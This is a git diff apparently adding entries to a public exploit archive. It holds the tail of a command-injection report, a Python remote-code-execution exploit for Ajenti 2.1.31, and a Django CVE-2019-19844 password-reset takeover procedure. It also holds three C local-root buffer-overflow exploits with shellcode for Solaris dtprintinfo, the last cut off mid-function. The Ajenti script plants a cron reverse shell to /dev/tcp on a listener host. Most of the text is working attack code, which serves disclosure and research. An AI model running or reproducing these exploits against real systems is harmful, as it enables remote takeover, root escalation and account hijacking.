+HTTP/1.1 200 OK 
+Date: Sat, 28 Sep 2019 09:42:26 GMT 
+Server: WSGIServer/0.2 CPython/3.5.3 
+Content-Length: 429 
+Content-Type: text/html; charset=utf-8 
+X-Frame-Options: SAMEORIGIN 
+
+Pinging 127.0.0.1 with 32 bytes of data: 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 
+Ping statistics for 127.0.0.1: 
+Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 
+Approximate round trip times in milli-seconds: 
+Minimum = 0ms, Maximum = 0ms, Average = 0ms 
+
+When I try to run following command, all commands run: 
+dir 
+whoami
\ No newline at end of file
diff --git a/exploits/python/webapps/47497.py b/exploits/python/webapps/47497.py
new file mode 100755
index 000000000..2648e5093
--- /dev/null
+++ b/exploits/python/webapps/47497.py
@@ -0,0 +1,115 @@
+# Title: Ajenti 2.1.31 - Remote Code Execution
+# Author: Jeremy Brown
+# Date: 2019-10-13
+# Software Link: https://github.com/ajenti/ajenti
+# CVE: N/A
+# Tested on: Ubuntu Linux
+
+#!/usr/bin/python
+# ajentix.py
+# 
+# Ajenti Remote Command Execution Exploit
+#
+# -------
+# Details
+# -------
+#
+# Ajenti is a web control panel written in Python and AngularJS. 
+#
+# One can locally monitor executed commands on the server while testing
+#
+# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
+# sending proc connector: PROC_CN_MCAST_LISTEN... sent
+# Reading process events from proc connector.
+# Hit Ctrl-C to exit
+#
+# Browse over to https://server:8000/view/login/normal to login
+#
+# .....
+# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
+# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
+#
+# Modified the JSON request username value to be `id`
+#
+# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
+# pid=7516 executed [id ]
+# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
+#
+# *ACK.....*
+#
+# Also the login routine times out after 5 seconds (see auth.py), which
+# makes an interactive shell relatively ephemeral. So, we cron job.
+#
+# $ python3 ajentix.py server.ip shell local-listener.ip
+# Done!
+#
+# $ nc -v -l -p 5555
+# Listening on [0.0.0.0] (family 0, port 5555)
+# Connection from server.domain 41792 received!
+# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
+# bash: no job control in this shell
+# nobody@server:/var/spool/cron$ ps
+#   PID TTY          TIME CMD
+#  6386 ?        00:00:00 /usr/local/bin/ <-- ajenti-panel worker
+# 18849 ?        00:00:00 sh
+# 18851 ?        00:00:00 bash
+# 18859 ?        00:00:00 ps
+#
+#
+# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
+# 
+# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
+#
+#
+
+import os
+import sys
+import ssl
+import json
+import urllib.request as request
+
+def main():
+	if(len(sys.argv) < 2):
+		print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
+		print("Eg:    %s 1.2.3.4 \"id\"" % sys.argv[0])
+		print("...    %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
+		return
+
+	host = sys.argv[1]
+	cmd = sys.argv[2]
+	
+	if(cmd == 'shell'):
+		if(len(sys.argv) < 4):
+			print("Error: need ip to connect back to for shell")
+			return
+		
+		ip = sys.argv[3]
+
+		shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
+		username = shell
+	
+	else:
+		username = "`" + cmd + "`"
+		
+	body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
+	byte = body.encode('utf-8')
+		
+	url = "https://" + host + ":8000" + "/api/core/auth"
+		
+	try:
+		req = request.Request(url)
+		
+		req.add_header('Content-Type', 'application/json; charset=utf-8')
+		req.add_header('Content-Length', len(byte))
+		
+		request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert
+			
+	except Exception as error:
+		print("Error: %s" % error)
+		return
+		
+	print("Done!")
+
+
+if(__name__ == '__main__'):
+	main()
\ No newline at end of file
diff --git a/exploits/python/webapps/47879.md b/exploits/python/webapps/47879.md
new file mode 100644
index 000000000..00d5c24e2
--- /dev/null
+++ b/exploits/python/webapps/47879.md
@@ -0,0 +1,31 @@
+EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip
+
+
+# django_cve_2019_19844_poc
+PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
+
+# Requirements
+
+- Python 3.7.x
+- PostgreSQL 9.5 or higher
+
+## Setup
+
+1. Create database(e.g. `django_cve_2019_19844_poc`)
+1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
+1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
+1. Create the following user with `shell` command:
+
+```python
+>>> from django.contrib.auth import get_user_model
+>>> User = get_user_model()
+>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
+```
+
+## Procedure For Reproducing
+
+1. Run `./manage.py runserver`
+1. Open `http://127.0.0.1:8000/accounts/password-reset/`
+1. Input `mıke@example.org` (Attacker's email), and click send button
+1. Receive email (Check console), and reset password
+1. Login as `mike123` user
\ No newline at end of file
diff --git a/exploits/solaris/local/46877.c b/exploits/solaris/local/46877.c
new file mode 100644
index 000000000..f01a23ba3
--- /dev/null
+++ b/exploits/solaris/local/46877.c
@@ -0,0 +1,285 @@
+/*
+ * raptor_dtprintname_intel.c - dtprintinfo 0day, Solaris/Intel
+ * Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
+ * local root. Many thanks to Dave Aitel for discovering this vulnerability
+ * and for his interesting research activities on Solaris/SPARC.
+ *
+ * "None of my dtprintinfo work is public, other than that 0day pack being
+ * leaked to all hell and back. It should all basically still work. Let's
+ * keep it that way, cool? :>" -- Dave Aitel
+ *
+ * This exploit uses the ret-into-ld.so technique to bypass the non-exec 
+ * stack protection. If experiencing troubles with null-bytes inside the 
+ * ld.so.1 memory space, try returning to sprintf() instead of strcpy().
+ *
+ * Usage:
+ * $ gcc raptor_dtprintname_intel.c -o raptor_dtprintname_intel -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintname_intel 192.168.1.1:0
+ * [...]
+ * # id
+ * uid=0(root) gid=1(other)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
+ * [previous Solaris versions are also vulnerable]
+ */
+
+#include <fcntl.h>
+#include <link.h>
+#include <procfs.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/systeminfo.h>
+
+#define INFO1	"raptor_dtprintname_intel.c - dtprintinfo 0day, Solaris/Intel"
+#define INFO2	"Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define	VULN	"/usr/dt/bin/dtprintinfo"	// the vulnerable program
+#define	BUFSIZE	301				// size of the printer name
+
+char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
+/* double setuid() */
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+/* execve() */
+"\x31\xc0\x50\x68/ksh\x68/bin"
+"\x89\xe3\x50\x53\x89\xe2\x50"
+"\x52\x53\xb0\x3b\x50\xcd\x91";
+
+/* globals */
+char	*env[256];
+int	env_pos = 0, env_len = 0;
+
+/* prototypes */
+int	add_env(char *string);
+void	check_zero(int addr, char *pattern);
+int	search_ldso(char *sym);
+int	search_rwx_mem(void);
+void	set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+	char	buf[BUFSIZE], ksh_var[16];
+	char	platform[256], release[256], display[256];
+	int	i, offset, sc_addr, ksh_pos;
+	int	plat_len, prog_len;
+
+	char	*arg[2] = {"foo", NULL};
+	int	sb = ((int)argv[0] | 0xfff);	/* stack base */
+	int	ret = search_ldso("strcpy");	/* or sprintf */
+	int	rwx_mem = search_rwx_mem();	/* rwx memory */
+
+	/* fake lpstat code */
+	if (!strcmp(argv[0], "lpstat")) {
+
+		/* check command line */
+		if (argc != 2)
+			exit(1);
+
+		/* get the shellcode address from the environment */
+		sc_addr = (int)strtoul(getenv("KSH"), (char **)NULL, 0);
+
+		/* prepare the evil printer name */
+		memset(buf, 'A', sizeof(buf));
+		buf[sizeof(buf) - 1] = 0x0;
+
+		/* fill with ld.so.1 address, saved eip, and arguments */
+		for (i = 0; i < BUFSIZE; i += 4) {
+			set_val(buf, i, ret);		/* strcpy */
+			set_val(buf, i += 4, rwx_mem);	/* saved eip */
+			set_val(buf, i += 4, rwx_mem);	/* 1st argument */
+			set_val(buf, i += 4, sc_addr);	/* 2nd argument */
+		}
+
+		/* print the expected output and exit */
+		if(!strcmp(argv[1], "-v")) {
+			fprintf(stderr, "lpstat called with -v\n");
+			printf("device for %s: /dev/null\n", buf);
+		} else {
+			fprintf(stderr, "lpstat called with -d\n");
+			printf("system default destination: %s\n", buf);
+		}
+		exit(0);
+	}
+
+	/* print exploit information */
+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+	/* read command line */
+	if (argc != 2) {
+		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+		exit(1);
+	}
+	sprintf(display, "DISPLAY=%s", argv[1]);
+
+	/* get some system information */
+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+
+	/* fill the envp, keeping padding */
+	add_env(sc);
+	ksh_pos = env_pos;
+	add_env("KSH=0x42424242");
+	add_env(display);
+	add_env("PATH=.:/usr/bin");
+	add_env("HOME=/tmp");
+	add_env(NULL);
+
+	/* calculate the offset to the shellcode */
+	plat_len = strlen(platform) + 1;
+	prog_len = strlen(VULN) + 1;
+	offset = 5 + env_len + plat_len + prog_len;
+
+	/* calculate the shellcode address */
+	sc_addr = sb - offset;
+
+	/* overwrite the KSH env var with the right address */
+	sprintf(ksh_var, "KSH=0x%x", sc_addr);
+	env[ksh_pos] = ksh_var;
+
+	/* create a symlink for the fake lpstat */
+	unlink("lpstat");
+	symlink(argv[0], "lpstat");
+
+	/* print some output */
+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
+	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
+
+	/* run the vulnerable program */
+	execve(VULN, arg, env);
+	perror("execve");
+	exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+	int	i;
+
+	/* null termination */
+	if (!string) {
+		env[env_pos] = NULL;
+		return(env_len);
+	}
+
+	/* add the variable to envp */
+	env[env_pos] = string;
+	env_len += strlen(string) + 1;
+	env_pos++;
+
+	/* pad the envp using zeroes */
+	if ((strlen(string) + 1) % 4)
+		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+			env[env_pos] = string + strlen(string);
+			env_len++;
+		}
+
+	return(env_len);
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+	    !(addr & 0xff000000)) {
+		fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+		exit(1);
+	}
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+	int		addr;
+	void		*handle;
+	Link_map	*lm;
+
+	/* open the executable object file */
+	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+		perror("dlopen");
+		exit(1);
+	}
+
+	/* get dynamic load information */
+	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+		perror("dlinfo");
+		exit(1);
+	}
+
+	/* search for the address of the symbol */
+	if ((addr = (int)dlsym(handle, sym)) == NULL) {
+		fprintf(stderr, "sorry, function %s() not found\n", sym);
+		exit(1);
+	}
+
+	/* close the executable object file */
+	dlclose(handle);
+
+	check_zero(addr - 4, sym);
+	return(addr);
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+	int	fd;
+	char	tmp[16];
+	prmap_t	map;
+	int	addr = 0, addr_old;
+
+	/* open the proc filesystem */
+	sprintf(tmp,"/proc/%d/map", (int)getpid());
+	if ((fd = open(tmp, O_RDONLY)) < 0) {
+		fprintf(stderr, "can't open %s\n", tmp);
+		exit(1);
+	}
+
+	/* search for the last RWX memory segment before stack (last - 1) */
+	while (read(fd, &map, sizeof(map)))
+		if (map.pr_vaddr)
+			if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+				addr_old = addr;
+				addr = map.pr_vaddr;
+			}
+	close(fd);
+
+	/* add 4 to the exact address NULL bytes */
+	if (!(addr_old & 0xff))
+		addr_old |= 0x04;
+	if (!(addr_old & 0xff00))
+		addr_old |= 0x0400;
+
+	return(addr_old);
+}
+
+/*
+ * set_val(): copy a dword inside a buffer (little endian)
+ */
+void set_val(char *buf, int pos, int val)
+{
+	buf[pos] =	(val & 0x000000ff);
+	buf[pos + 1] =	(val & 0x0000ff00) >> 8;
+	buf[pos + 2] =	(val & 0x00ff0000) >> 16;
+	buf[pos + 3] =	(val & 0xff000000) >> 24;
+}
\ No newline at end of file
diff --git a/exploits/solaris/local/46878.c b/exploits/solaris/local/46878.c
new file mode 100644
index 000000000..184b9e433
--- /dev/null
+++ b/exploits/solaris/local/46878.c
@@ -0,0 +1,198 @@
+/*
+ * raptor_dtprintname_sparc.c - dtprintinfo 0day, Solaris/SPARC
+ * Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
+ * local root. Many thanks to Dave Aitel for discovering this vulnerability
+ * and for his interesting research activities on Solaris/SPARC.
+ *
+ * "None of my dtprintinfo work is public, other than that 0day pack being
+ * leaked to all hell and back. It should all basically still work. Let's
+ * keep it that way, cool? :>" -- Dave Aitel
+ *
+ * Usage:
+ * $ gcc raptor_dtprintname_sparc.c -o raptor_dtprintname_sparc -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintname_sparc 192.168.1.1:0
+ * [...]
+ * # id
+ * uid=0(root) gid=10(staff)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.7 Generic_106541-21 sun4u sparc SUNW,Ultra-1
+ * SunOS 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
+ * SunOS 5.9 Generic sun4u sparc SUNW,Ultra-5_10
+ * [SunOS 5.10 is also vulnerable, the exploit might require some tweaking]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/systeminfo.h>
+
+#define INFO1	"raptor_dtprintname_sparc.c - dtprintinfo 0day, Solaris/SPARC"
+#define INFO2	"Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define	VULN	"/usr/dt/bin/dtprintinfo"	// the vulnerable program
+#define	BUFSIZE	301				// size of the printer name
+
+/* voodoo macros */
+#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
+#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}
+
+char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
+/* double setuid() */
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+/* execve() */
+"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
+"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
+"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
+
+/* globals */
+char	*env[256];
+int	env_pos = 0, env_len = 0;
+
+/* prototypes */
+int	add_env(char *string);
+void	set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+	char	buf[BUFSIZE], var[16];
+	char	platform[256], release[256], display[256];
+	int	i, offset, ret, var_pos;
+	int	plat_len, prog_len, rel;
+
+	char	*arg[2] = {"foo", NULL};
+	int	arg_len = 4, arg_pos = 1;
+
+	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
+
+	/* fake lpstat code */
+	if (!strcmp(argv[0], "lpstat")) {
+
+		/* check command line */
+		if (argc != 2)
+			exit(1);
+
+		/* get ret address from environment */
+		ret = (int)strtoul(getenv("RET"), (char **)NULL, 0);
+
+		/* prepare the evil printer name */
+		memset(buf, 'A', sizeof(buf));
+		buf[sizeof(buf) - 1] = 0x0;
+
+		/* fill with return address */
+		for (i = 0; i < BUFSIZE; i += 4)
+			set_val(buf, i, ret - 8);
+
+		/* print the expected output and exit */
+		if(!strcmp(argv[1], "-v")) {
+			fprintf(stderr, "lpstat called with -v\n");
+			printf("device for %s: /dev/null\n", buf);
+		} else {
+			fprintf(stderr, "lpstat called with -d\n");
+			printf("system default destination: %s\n", buf);
+		}
+		exit(0);
+	}
+
+	/* print exploit information */
+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+	/* read command line */
+	if (argc != 2) {
+		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+		exit(1);
+	}
+	sprintf(display, "DISPLAY=%s", argv[1]);
+
+	/* get some system information */
+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+	rel = atoi(release + 2);
+
+	/* fill the envp, keeping padding */
+	add_env(sc);
+	var_pos = env_pos;
+	add_env("RET=0x41414141");
+	add_env(display);
+	add_env("PATH=.:/usr/bin");
+	add_env("HOME=/tmp");
+	add_env(NULL);
+
+	/* calculate the offset to argv[0] (voodoo magic) */
+	plat_len = strlen(platform) + 1;
+	prog_len = strlen(VULN) + 1;
+	offset = arg_len + env_len + plat_len + prog_len;
+	if (rel > 7)
+		VOODOO64(offset, arg_pos, env_pos)
+	else
+		VOODOO32(offset, plat_len, prog_len)
+
+	/* calculate the needed addresses */
+	ret = sb - offset + arg_len;
+
+	/* overwrite the RET env var with the right ret address */
+	sprintf(var, "RET=0x%x", ret);
+	env[var_pos] = var;
+
+	/* create a symlink for the fake lpstat */
+	unlink("lpstat");
+	symlink(argv[0], "lpstat");
+
+	/* print some output */
+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+	fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);
+
+	/* run the vulnerable program */
+	execve(VULN, arg, env);
+	perror("execve");
+	exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+	int	i;
+
+	/* null termination */
+	if (!string) {
+		env[env_pos] = NULL;
+		return(env_len);
+	}
+
+	/* add the variable to envp */
+	env[env_pos] = string;
+	env_len += strlen(string) + 1;
+	env_pos++;
+
+	/* pad the envp using zeroes */
+	if ((strlen(string) + 1) % 4)
+		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+			env[env_pos] = string + strlen(string);
+			env_len++;
+		}
+
+	return(env_len);
+}
+
+/*
+ * set_val(): copy a dword inside a buffer
+ */
+void set_val(char *buf, int pos, int val)
+{
+	buf[pos] =	(val & 0xff000000) >> 24;
+	buf[pos + 1] =	(val & 0x00ff0000) >> 16;
+	buf[pos + 2] =	(val & 0x0000ff00) >> 8;
+	buf[pos + 3] =	(val & 0x000000ff);
+}
\ No newline at end of file
diff --git a/exploits/solaris/local/46879.c b/exploits/solaris/local/46879.c
new file mode 100644
index 000000000..7fb2af36b
--- /dev/null
+++ b/exploits/solaris/local/46879.c
@@ -0,0 +1,341 @@
+/*
+ * raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC
+ * Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>
+ *
+ * 0day buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
+ * local root. Many thanks to Dave Aitel for discovering this vulnerability
+ * and for his interesting research activities on Solaris/SPARC.
+ *
+ * "None of my dtprintinfo work is public, other than that 0day pack being
+ * leaked to all hell and back. It should all basically still work. Let's
+ * keep it that way, cool? :>" -- Dave Aitel
+ *
+ * This is the ret-into-ld.so version of raptor_dtprintname_sparc.c, able 
+ * to bypass the non-executable stack protection (noexec_user_stack=1 in 
+ * /etc/system).
+ *
+ * NOTE. If experiencing troubles with null-bytes inside the ld.so.1 memory 
+ * space, use sprintf() instead of strcpy() (tested on some Solaris 7 boxes).
+ *
+ * Usage:
+ * $ gcc raptor_dtprintname_sparc2.c -o raptor_dtprintname_sparc2 -ldl -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintname_sparc2 192.168.1.1:0
+ * [...]
+ * # id
+ * uid=0(root) gid=10(staff)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.7 Generic_106541-21 sun4u sparc SUNW,Ultra-1
+ * SunOS 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
+ * SunOS 5.9 Generic sun4u sparc SUNW,Ultra-5_10
+ * [SunOS 5.10 is also vulnerable, the exploit might require some tweaking]
+ */
+
+#include <dlfcn.h>
+#include <fcntl.h>
+#include <link.h>
+#include <procfs.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <strings.h>
+#include <unistd.h>
+#include <sys/systeminfo.h>
+
+#define INFO1	"raptor_dtprintname_sparc2.c - dtprintinfo 0day, Solaris/SPARC"
+#define INFO2	"Copyright (c) 2004-2019 Marco Ivaldi <raptor@0xdeadbeef.info>"
+
+#define	VULN	"/usr/dt/bin/dtprintinfo"	// the vulnerable program
+#define	BUFSIZE	301				// size of the printer name
+#define	FFSIZE	64 + 1				// size of the fake frame
+#define	DUMMY	0xdeadbeef			// dummy memory address
+
+/* voodoo macros */
+#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
+#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}
+
+char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
+/* double setuid() */
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
+/* execve() */
+"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
+"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
+"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
+
+/* globals */
+char	*env[256];
+int	env_pos = 0, env_len = 0;
+
+/* prototypes */
+int	add_env(char *string);
+void	check_zero(int addr, char *pattern);
+int	search_ldso(char *sym);
+int	search_rwx_mem(void);
+void	set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+	char	buf[BUFSIZE], ff[FFSIZE], ret_var[16], fpt_var[16];
+	char	platform[256], release[256], display[256];
+	int	i, offset, ff_addr, sc_addr, ret_pos, fpt_pos;
+	int	plat_len, prog_len, rel;
+
+	char	*arg[2] = {"foo", NULL};
+	int	arg_len = 4, arg_pos = 1;
+
+	int	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
+	int	ret = search_ldso("strcpy");	/* or sprintf */
+	int	rwx_mem = search_rwx_mem();
+
+	/* fake lpstat code */
+	if (!strcmp(argv[0], "lpstat")) {
+
+		/* check command line */
+		if (argc != 2)
+			exit(1);
+
+		/* get ret and fake frame addresses from environment */
+		ret = (int)strtoul(getenv("RET"), (char **)NULL, 0);
+		ff_addr = (int)strtoul(getenv("FPT"), (char **)NULL, 0);
+
+		/* prepare the evil printer name */
+		memset(buf, 'A', sizeof(buf));
+		buf[sizeof(buf) - 1] = 0x0;
+
+		/* fill with return and fake frame addresses */
+		for (i = 0; i < BUFSIZE; i += 4) {
+			/* apparently, we don't need to bruteforce */
+			set_val(buf, i, ret - 4);
+			set_val(buf, i += 4, ff_addr);
+		}
+
+		/* print the expected output and exit */
+		if(!strcmp(argv[1], "-v")) {
+			fprintf(stderr, "lpstat called with -v\n");
+			printf("device for %s: /dev/null\n", buf);
+		} else {
+			fprintf(stderr, "lpstat called with -d\n");
+			printf("system default destination: %s\n", buf);
+		}
+		exit(0);
+	}
+
+	/* print exploit information */
+	fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+	/* read command line */
+	if (argc != 2) {
+		fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+		exit(1);
+	}
+	sprintf(display, "DISPLAY=%s", argv[1]);
+
+	/* get some system information */
+	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+	rel = atoi(release + 2);
+
+	/* prepare the fake frame */
+	bzero(ff, sizeof(ff));
+
+	/*
+	 * saved %l registers
+	 */
+	set_val(ff, i  = 0, DUMMY);		/* %l0 */
+	set_val(ff, i += 4, DUMMY);		/* %l1 */
+	set_val(ff, i += 4, DUMMY);		/* %l2 */
+	set_val(ff, i += 4, DUMMY);		/* %l3 */
+	set_val(ff, i += 4, DUMMY);		/* %l4 */
+	set_val(ff, i += 4, DUMMY);		/* %l5 */
+	set_val(ff, i += 4, DUMMY);		/* %l6 */
+	set_val(ff, i += 4, DUMMY);		/* %l7 */
+
+	/*
+	 * saved %i registers
+	 */
+	set_val(ff, i += 4, rwx_mem);		/* %i0: 1st arg to strcpy() */
+	set_val(ff, i += 4, 0x42424242);	/* %i1: 2nd arg to strcpy() */
+	set_val(ff, i += 4, DUMMY);		/* %i2 */
+	set_val(ff, i += 4, DUMMY);		/* %i3 */
+	set_val(ff, i += 4, DUMMY);		/* %i4 */
+	set_val(ff, i += 4, DUMMY);		/* %i5 */
+	set_val(ff, i += 4, sb - 1000);		/* %i6: frame pointer */
+	set_val(ff, i += 4, rwx_mem - 8);	/* %i7: return address */
+
+	/* fill the envp, keeping padding */
+	sc_addr = add_env(ff);
+	add_env(sc);
+	ret_pos = env_pos;
+	add_env("RET=0x41414141");
+	fpt_pos = env_pos;
+	add_env("FPT=0x42424242");
+	add_env(display);
+	add_env("PATH=.:/usr/bin");
+	add_env("HOME=/tmp");
+	add_env(NULL);
+
+	/* calculate the offset to argv[0] (voodoo magic) */
+	plat_len = strlen(platform) + 1;
+	prog_len = strlen(VULN) + 1;
+	offset = arg_len + env_len + plat_len + prog_len;
+	if (rel > 7)
+		VOODOO64(offset, arg_pos, env_pos)
+	else
+		VOODOO32(offset, plat_len, prog_len)
+
+	/* calculate the needed addresses */
+	ff_addr = sb - offset + arg_len;
+	sc_addr += ff_addr;
+
+	/* set fake frame's %i1 */
+	set_val(ff, 36, sc_addr);		/* 2nd arg to strcpy() */
+
+	/* overwrite RET and FPT env vars with the right addresses */
+	sprintf(ret_var, "RET=0x%x", ret);
+	env[ret_pos] = ret_var;
+	sprintf(fpt_var, "FPT=0x%x", ff_addr);
+	env[fpt_pos] = fpt_var;
+
+	/* create a symlink for the fake lpstat */
+	unlink("lpstat");
+	symlink(argv[0], "lpstat");
+
+	/* print some output */
+	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+	fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+	fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
+	fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
+	fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
+
+	/* run the vulnerable program */
+	execve(VULN, arg, env);
+	perror("execve");
+	exit(0);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+	int	i;
+
+	/* null termination */
+	if (!string) {
+		env[env_pos] = NULL;
+		return(env_len);
+	}
+
+	/* add the variable to envp */
+	env[env_pos] = string;
+	env_len += strlen(string) + 1;
+	env_pos++;
+
+	/* pad the envp using zeroes */
+	if ((strlen(string) + 1) % 4)
+		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+			env[env_pos] = string + strlen(string);
+			env_len++;
+		}
+
+	return(env_len);
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+	if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+	    !(addr & 0xff000000)) {
